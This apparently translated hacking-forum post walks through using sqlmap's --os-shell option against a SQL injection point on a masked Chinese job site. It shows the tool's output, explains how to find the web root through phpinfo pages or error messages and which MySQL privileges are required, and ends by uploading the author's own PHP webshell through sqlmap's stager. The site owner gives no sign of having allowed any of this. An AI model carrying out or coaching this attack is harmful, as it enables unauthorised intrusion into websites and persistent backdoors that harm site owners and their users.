Uploading a shell through an sqlmap injection point

- I only just discovered this method myself..

Based on 九区's article: http://fuzzexp.org/newly-discovered-sqlmap-upload-files-a-bug-2.html

I tweaked it a bit - = good enough to use, and anyway I damn well got the shell.

Record begins.

sqlmap.py -u "http://www.****.cn/job/index.php?key=1" --os-shell

[14:39:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, PHP 5.2.9
back-end DBMS: MySQL 5.0
[14:39:11] [INFO] going to use a web backdoor for command prompt
[14:39:11] [INFO] fingerprinting the back-end DBMS operating system
[14:39:12] [INFO] the back-end DBMS operating system is Windows
[14:39:12] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>

Of course this is a PHP site, so we pick 3, PHP (default).

[14:42:09] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]:

What if you don't know the path? - - Use a scanner to look for phpinfo.php or some other file under the directory and read the physical path from it (a phpinfo() page shows DOCUMENT_ROOT and SCRIPT_FILENAME; a PHP error message with a full path works just as well).

Once you have the path, type it into the prompt that just appeared.

[14:42:09] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]:E:/Web/ygbh

After pressing Enter a few more lines appear asking for extra directories to try uploading into; just press Enter and leave it empty, the document root you gave is enough. Keep in mind that sqlmap writes the stager into that directory with SELECT ... INTO OUTFILE, so this only works when the MySQL user has the FILE privilege, secure_file_priv does not restrict writes to that path, and the directory is writable by the account MySQL runs as; a wrong or unwritable path simply means the stager never shows up.

[14:44:35] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]:

After the next Enter, sqlmap looks like this:

[14:45:53] [INFO] the file stager has been successfully uploaded on 'E:/Web/ygbh' ('http://www.****.cn:80/tmpuodot.php')
[14:45:53] [INFO] the backdoor has probably been successfully uploaded on 'E:/Web/ygbh', go with your browser to 'http://www.****.cn:80//tmpbcmnd.php' and enjoy it!
[14:45:53] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>

- - tmpuodot.php tmpbcmnd.php You'll find there are two files!! Two files!! 九区 probably misread that.

One is the upload file (the stager)! The other is the file that executes cmd (the backdoor)! It's two files! sqlmap names the stager tmpu<random>.php (u for uploader) and the backdoor tmpb<random>.php (b for backdoor), which is how you tell them apart; the os-shell> prompt talks to the backdoor, and both files stay on the server after you quit unless you delete them.

Open http://www.****.cn/tmpuodot.php and upload our own PHP webshell through the stager's form - = ignore the other one.

Done!
